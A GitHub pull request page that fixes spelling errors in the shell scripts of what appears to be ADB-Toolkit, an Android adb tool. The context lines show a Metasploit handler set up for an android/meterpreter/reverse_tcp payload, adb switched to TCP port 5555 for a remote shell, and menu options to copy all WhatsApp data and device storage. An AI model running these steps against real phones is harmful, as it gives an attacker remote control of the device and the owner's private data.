Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

further-typos #12

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 11 additions & 11 deletions modules/2opt2
Original file line number Diff line number Diff line change
Expand Up @@ -103,10 +103,10 @@ apk_install () {
fi
}

start_listner () {
start_listener () {

adb -s $devv shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1 >/dev/null 2>&1 | echo -e "\e[1;93mLaunching the PAYLOAD.\e[0m"; echo -e "\n\e[1;92mDone\n"
echo -e "\e[1;92mStarting the MSF listner\n"
echo -e "\e[1;92mStarting the MSF listener\n"
time=$(date +"%T")
echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost1\nset LPORT $lport1\nexploit" > $PWD/metasploit/.exploit-$time.rc
msfconsole -q -r $PWD/metasploit/.exploit-$time.rc
Expand All @@ -131,11 +131,11 @@ dev_1_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done
}
Expand All @@ -157,11 +157,11 @@ dev_2_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done
}
Expand All @@ -183,11 +183,11 @@ dev_3_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done

Expand Down
2 changes: 1 addition & 1 deletion modules/function2.sh
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ option2_list () {
echo -e "\n\e[1;93m5. \e[1;92mGO BACK TO ADB-Toolkit"
echo -e "\e[1;92mEXIT or press Ctrl+c\n"
echo -e $revised
read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options2
read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options2

}

Expand Down
2 changes: 1 addition & 1 deletion modules/funtion.sh
Original file line number Diff line number Diff line change
Expand Up @@ -65,7 +65,7 @@ echo -e "\e[1;93m21. \e[1;92mCOPY ALL WHATSAPP DATA"
echo -e "\e[1;93m22. \e[1;92mCOPY ALL DEVICE STORAGE ( Takes time ) \e[1;93mA. \e[1;92mABOUT AUTHOUR "
echo -e "\e[1;93m23. \e[1;92mCOPY A SPECIFIED FILE OR FOLDER \e[1;91mEXIT or press Ctrl+c\n"
echo -e $revised
read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options
read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options

}

Expand Down
6 changes: 3 additions & 3 deletions modules/opt16
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,7 @@ remote_shell () {
dev_1_remo () {

devvv=$(echo "$dev_1")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_1 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_1 connect $dev_ip) > /dev/null 2>&1
Expand All @@ -79,7 +79,7 @@ dev_1_remo () {
dev_2_remo () {

devvv=$(echo "$dev_2")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_2 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_2 connect $dev_ip) > /dev/null 2>&1
Expand All @@ -98,7 +98,7 @@ dev_2_remo () {
dev_3_remo () {

devvv=$(echo "$dev_3")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_3 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_3 connect $dev_ip) > /dev/null 2>&1
Expand Down